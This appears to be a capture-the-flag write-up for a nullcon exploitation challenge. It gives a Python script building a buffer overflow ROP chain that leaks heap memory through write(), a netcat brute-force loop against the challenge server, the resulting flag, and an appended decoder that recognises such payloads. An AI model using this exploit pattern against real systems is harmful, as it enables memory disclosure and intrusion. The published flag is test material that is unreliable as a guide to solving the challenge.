HackIM nullcon exploitation 400 write-up [exploit]

by sweetchip 2014. 1. 27. 15:29

Topic: simple stack-based buffer overflow


binary :

chall_heap



import time
import struct

# Pack a value as a 32-bit little-endian word (x86).
p = lambda x: struct.pack("<I", x)

write = 0x08048440    # write()

ppppr = 0x080486a6    # pop; pop; pop; pop; ret
pppr = ppppr + 1      # pop; pop; pop; ret
ppr = pppr + 1
pr = ppr + 1
r = pr + 1

payload = b"A" * 0x64

# One write(1, i, 0x1000) call per 0x1000-byte step of the address range.
for i in range(0x09371008, 0x094ed008, 0x1000):
    payload += p(write)    # ret here
    payload += p(pppr)     # return address of write(): pops its 3 arguments
    payload += p(1)        # fd
    payload += p(i)        # buf
    payload += p(0x1000)   # len

f = open("a.txt", "wb")
f.write(payload)
f.close()

"""
root@ubuntu:/home/sweetchip/Desktop/cyber/ncon# execstack ./chall_heap
- ./chall_heap
root@ubuntu:/home/sweetchip/Desktop/cyber/ncon# while [ 1 ] ; do (cat a.txt) | nc 23.23.190.205 8976 ; done > nc.txt
^C
root@ubuntu:/home/sweetchip/Desktop/cyber/ncon# cat nc.txt | sort | uniq -c
1 ?Good Enough? Pwn Me!
1 96d1c4d1f47b666928a37f7dd6a4383e
77 Good Enough? Pwn Me!

key : 96d1c4d1f47b666928a37f7dd6a4383e
"""


Running the code above as a brute force roughly 100 times prints the key about once.


Aaargh..


flag : 96d1c4d1f47b666928a37f7dd6a4383e
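
To make the layout of a.txt explicit, the following added example (not part of the original post) decodes a request of that shape back into its 5-word frames and reports the memory range the chain writes to fd 1. The function names and the constructed sample are assumptions; the addresses and the 0x64 offset come from the script above.

```python
import struct

# Constants taken from the write-up's script.
WRITE = 0x08048440   # called as write(fd, buf, len)
PPPR = 0x080486a7    # ppppr + 1: pops the three arguments, then returns
PAD_LEN = 0x64       # filler bytes before the saved return address
FRAME = struct.Struct("<5I")  # call target, cleanup gadget, fd, buf, len


def decode_chain(payload, pad_len=PAD_LEN):
    """Split a captured request into padding and 5-word call frames."""
    body = payload[pad_len:]
    usable = len(body) - len(body) % FRAME.size  # ignore a truncated tail
    return [FRAME.unpack_from(body, off) for off in range(0, usable, FRAME.size)]


def summarize_sweep(frames):
    """Return (first_addr, end_addr, stride) if every frame is the same
    write(1, addr, len) call over evenly spaced addresses, else None."""
    if not frames:
        return None
    length = frames[0][4]
    addrs = []
    for target, cleanup, fd, buf, frame_len in frames:
        if (target, cleanup, fd) != (WRITE, PPPR, 1) or frame_len != length:
            return None
        addrs.append(buf)
    strides = {b - a for a, b in zip(addrs, addrs[1:])}
    if len(strides) > 1:
        return None
    stride = strides.pop() if strides else length
    return addrs[0], addrs[-1] + length, stride


def build_sample(start, count, step=0x1000):
    """Constructed sample: a short chain in the same layout as a.txt."""
    out = b"A" * PAD_LEN
    for i in range(count):
        out += FRAME.pack(WRITE, PPPR, 1, start + i * step, step)
    return out


if __name__ == "__main__":
    frames = decode_chain(build_sample(0x09371008, 4))
    first, end, stride = summarize_sweep(frames)
    print("%d frames, write(1, ...) over 0x%08x-0x%08x, stride 0x%x"
          % (len(frames), first, end, stride))
```

A request that is 0x64 filler bytes followed by hundreds of identical 20-byte frames differing only in the buffer address is the pattern this decoder recognises; ordinary input returns None from summarize_sweep.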
